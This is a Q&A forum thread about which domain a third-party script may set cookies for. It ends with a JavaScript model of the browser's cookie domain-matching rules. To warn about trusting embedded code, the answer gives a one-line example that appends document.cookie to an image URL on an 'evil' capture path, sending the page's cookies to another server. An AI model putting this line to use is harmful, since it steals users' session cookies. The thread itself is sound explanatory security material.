
Can a third-party script set a first-party cookie?

I've read a lot of content online about cookies, but nothing addressing this question: Let's say I have a server at a.com and a web page served by b.com embeds a script in that web page which lives on my server:

<script src='a.com/script.js'></script>

What is that script allowed to do in terms of setting cookies? Can it set a cookie with domain=a.com? I'd assume so since the script is served from that domain. Can it also set a cookie with domain=b.com since the page is served from that server?

I'm trying to get my head around what "first-party" and "third-party" mean in the context of my script called from another host's web page.

user3026299 asked Nov 24 '13 01:11



1 Answer

I don't believe the origin of a .js file is relevant. The cookie domain has to do with the domain of the document being rendered.

If I visit http://www.b.com/ and it includes

<script src="http://www.a.com/some/file.js"></script>

Then b.com is trusting a.com's code to act in good faith. The code executes as part of the page being viewed. Since the JavaScript code will execute in the browser, it could read cookies from b.com and pass that data along by creating an <img> tag in the document where src includes the data.

For example, if a.com's javascript file includes

document.writeln("<img src='http://www.a.com/evil/data/capturer?" + document.cookie + "'>");

Then the malicious webmaster of a.com could check his web server logs and see b.com's cookies.

So, the question is, if a.com is malicious, why did b.com include code from a.com in their page? They probably didn't. As web developers, we need to verify the trustworthiness of any 3rd party code we embed in our sites.

Brandon answered Oct 17 '22 03:10
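The rule the answer relies on, as an added example (this is not code from the question or the answer, and it is a model, not a browser): a browser deciding whether to accept a cookie's Domain attribute looks only at the host of the document that is running the script, never at the host the script file was fetched from. The code below implements the RFC 6265 domain-matching and Domain-attribute checks over a tiny in-memory cookie jar and runs the post's scenario, a page on www.b.com that loads a script from a.com. Function names, cookie names and the four-entry stand-in for the Public Suffix List are assumptions made for the illustration.

```javascript
// Added example (not code from the original question or answer): a small model
// of the RFC 6265 cookie domain rules a browser applies when a script sets or
// reads document.cookie. Only the page's own host matters; where the <script>
// file was fetched from never enters the decision. The hosts www.b.com and
// a.com follow the post; all function and cookie names are made up.

// Stand-in for the browser's Public Suffix List (real browsers use the full
// list); a cookie may never be scoped to one of these.
const PUBLIC_SUFFIXES = new Set(["com", "net", "org", "co.uk"]);

// RFC 6265 section 5.1.3: host domain-matches domain if they are identical, or
// if host ends with "." + domain and host is not an IP address literal.
function domainMatches(host, domain) {
  host = host.toLowerCase();
  domain = domain.toLowerCase();
  if (host === domain) return true;
  if (!host.endsWith("." + domain)) return false;
  return !/^\d{1,3}(\.\d{1,3}){3}$/.test(host); // IPv4 literal: no match
}

// RFC 6265 section 5.3 steps 5-6: decide whether a Domain attribute is accepted
// for a cookie set by a document served from documentHost.
function acceptCookieDomain(documentHost, domainAttr) {
  const host = documentHost.toLowerCase();
  if (!domainAttr) {
    // No Domain attribute: host-only cookie, sent back to exactly this host.
    return { accepted: true, hostOnly: true, domain: host };
  }
  let d = domainAttr.toLowerCase();
  if (d.startsWith(".")) d = d.slice(1); // a leading dot is ignored
  if (PUBLIC_SUFFIXES.has(d)) {
    return { accepted: false, reason: `${d} is a public suffix` };
  }
  if (!domainMatches(host, d)) {
    return { accepted: false, reason: `${host} does not domain-match ${d}` };
  }
  return { accepted: true, hostOnly: false, domain: d };
}

// Model of `document.cookie = cookieString` executed in a page on documentHost.
// Path, Expires, Secure and HttpOnly are ignored to keep the model short.
function setCookie(jar, documentHost, cookieString) {
  const [pair, ...attrs] = cookieString.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  if (eq <= 0) return { accepted: false, reason: "malformed name=value" };
  const name = pair.slice(0, eq);
  const value = pair.slice(eq + 1);
  let domainAttr;
  for (const attr of attrs) {
    const [k, v = ""] = attr.split("=");
    if (k.trim().toLowerCase() === "domain") domainAttr = v.trim();
  }
  const decision = acceptCookieDomain(documentHost, domainAttr);
  if (!decision.accepted) return decision;
  const cookie = { name, value, domain: decision.domain, hostOnly: decision.hostOnly };
  // A cookie with the same name and scope replaces the earlier one.
  const i = jar.findIndex(
    (c) => c.name === name && c.domain === cookie.domain && c.hostOnly === cookie.hostOnly
  );
  if (i >= 0) jar[i] = cookie; else jar.push(cookie);
  return { accepted: true, cookie };
}

// Model of reading document.cookie in a page on host: every cookie whose scope
// covers that host, regardless of which script is doing the reading.
function cookieHeaderFor(jar, host) {
  const h = host.toLowerCase();
  return jar
    .filter((c) => (c.hostOnly ? c.domain === h : domainMatches(h, c.domain)))
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// The scenario from the post: http://www.b.com/ loads http://www.a.com/some/file.js.
function demo() {
  const jar = [];
  setCookie(jar, "a.com", "aid=set-on-a-visit-to-a.com"); // an earlier direct visit to a.com
  const page = "www.b.com";
  return {
    hostOnly: setCookie(jar, page, "sid=xyz").accepted,                  // true
    parentDomain: setCookie(jar, page, "track=1; Domain=b.com").accepted, // true
    scriptOrigin: setCookie(jar, page, "track=2; Domain=a.com").accepted, // false
    publicSuffix: setCookie(jar, page, "wide=1; Domain=com").accepted,    // false
    childHost: acceptCookieDomain("b.com", "www.b.com").accepted,         // false
    visibleOnB: cookieHeaderFor(jar, page),     // "sid=xyz; track=1"
    visibleOnA: cookieHeaderFor(jar, "a.com"),  // "aid=set-on-a-visit-to-a.com"
  };
}

console.log(demo());
```

Read against the question: the a.com script running on www.b.com can set a host-only cookie for www.b.com or a cookie for Domain=b.com, but a Domain=a.com attribute is rejected because www.b.com does not domain-match a.com. The `visibleOnB` string is what `document.cookie` evaluates to in the answer's `<img>` snippet, which is why what leaks to a.com's server log is b.com's cookies and not a.com's own. The model leaves out the HttpOnly attribute; in a real browser an HttpOnly cookie is still sent to www.b.com but never appears in `document.cookie`, so it would not be in that query string.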